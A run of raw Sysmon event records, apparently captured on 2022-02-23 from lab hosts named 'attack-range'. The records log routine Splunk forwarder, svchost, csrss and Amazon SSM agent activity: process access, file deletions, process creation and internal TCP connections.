10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0E7F-6216-0204-000000003902}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E7F-6216-0204-000000003902}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.610{4F8D34B0-0E7F-6216-0204-000000003902}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:52.828{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFE749FD7B6059DEB686F6FA393BCB84,SHA256=140E988D05930F19358268F5A31CCE87BD95CC62021F58BA24E2A2814B9D358C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:52.657{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F731333EE94C4FD9B0C7AD7AC79EBE91,SHA256=2C212ADCA3AC534FE74FCB089EB7328FD8CE30473A35039C4FB75EA18845E060,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:53.875{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF83A0053C92D04060090DB31BD37B1,SHA256=A3C7F250087B7655D0B826B42F0A2B4145040845BF8F3267876EDF935E25C2E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:53.014{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DB41DC94054B4DCC11CB3E0C146A81D,SHA256=1CE5E0DC866ECBB4B9FB0CE1AA15C7D22748879289DE5D45BAF3F65DC7CFAB01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:54.061{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E39600E640E9D9E4305AA5108FD0228,SHA256=D1F9542428792397FB4726C87C2ADCB69C178729D5C820F93D7BAF65531719DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:53.580{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51188-false10.0.1.12-8000- 23542300x8000000000000000214452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:55.031{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90A0689D7D1D2F0026E5DFF71F2B4760,SHA256=810E5FF41C48B4962E916CE353249780E220AABEEC0CC998ADFCEFE9982AB2D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:53.569{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53242-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:55.139{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D72A9ABB0F71ADDCEDF2B0202C2CEA18,SHA256=D67E9A48CBA6C97DC8FBD85DE655F60DA2156AF1CCC9A09F359AC6625A350F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:56.031{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D32E9B60C666FFEE3BB2974D8C8CE569,SHA256=E44042944D7EA6992BBBB304CC982832D913F0903879A0EE0D6852AFF5240AED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:56.139{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=024225123FC09C1FE7E66DB0B65C3176,SHA256=D5FEEA21F00B424635D0DC03C68067F18F4ABC7183AACC5BB919F97F3119B549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:57.234{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF4F9A3877863FA3819CE4B358C17736,SHA256=365DC763EAA06CD8BA6E253D85EE505E6482DB2CE4E33C924433C9CADECCE9DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:57.146{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4312D57C1F357BE4850EAFE684483684,SHA256=83305F0D971958960196027045ABA1839E969E3A1867B09878897FF0302C1AE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:57.112{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-121MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:58.359{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89300D6B104103D857F184F4EEBD83A8,SHA256=635E0ADC2992537DADF1FE67AB74E220F8FAB031A1BE2B495C125B55A91702AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:58.148{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBC185B3D1318EB73104AD3102E1ED5E,SHA256=74B8DC5E077F44B25A213C7B3C904AF290C9162CE4E4A8D36DC9AB301D316F8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:58.119{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-122MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:59.375{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7159E248D0F4C3313F134FCEDABE4722,SHA256=2A7200E272A082DB3A2D7829F8F60846F43B912572B836D6A32C7D1707B02ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:59.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=582F8F95E24D34988D29E0455FAFA798,SHA256=FA1B79BC3D6211DD6D88F24D845EA218B5AB935F13F335C804C99EB4F281BBA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:58.611{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51189-false10.0.1.12-8000- 23542300x8000000000000000214458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:00.500{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F22D25A78329FD0EB0BB1D651E893808,SHA256=C855123080668EB9EF84A191D546D3BFF0AAF65307AC348D0FD6D1AE8ABCF3EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:00.182{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA28AD97DD9D1F57B5EDA6796D7D4E2B,SHA256=92873C8C46DCF217DCEE5E5E9B0DAC6B7742A4AFAC8AAB752581A55BF9DFD4D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:01.609{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F11B3D5DDCD7193FD1014CE481CF9341,SHA256=E577ECF30A5F374671F0CCD569AA5F38CD7B979309B6112974A324DBF80A2381,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:59.565{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53243-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:01.229{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37374E5F23275C16F0341B9CF519D49,SHA256=FE63121039425E0F021BCC3457717B590299DCD8180436D241392B483DA09A79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:02.609{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=243C3115C3DE8B3E818C3F11BF2934C7,SHA256=AA4A1781DB29246C93B332FF15B677BD0869F7C80DC5A9CC62665E5D01F51D63,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.744{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.744{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.744{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.744{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.744{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E8A-6216-AD04-000000003802}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.744{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0E8A-6216-AD04-000000003802}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.744{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E8A-6216-AD04-000000003802}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.746{C8EA50B7-0E8A-6216-AD04-000000003802}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.510{C8EA50B7-0E8A-6216-AC04-000000003802}10765264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.309{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C1DFB97134C33BEA0C12F85DD157F9,SHA256=FD3BC5FAF236BA45B412C3927E66AD05229C3BE7A2A0621580C73FA1EF3DD975,IMPHASH=00000000000000000000000000000000falsetrue 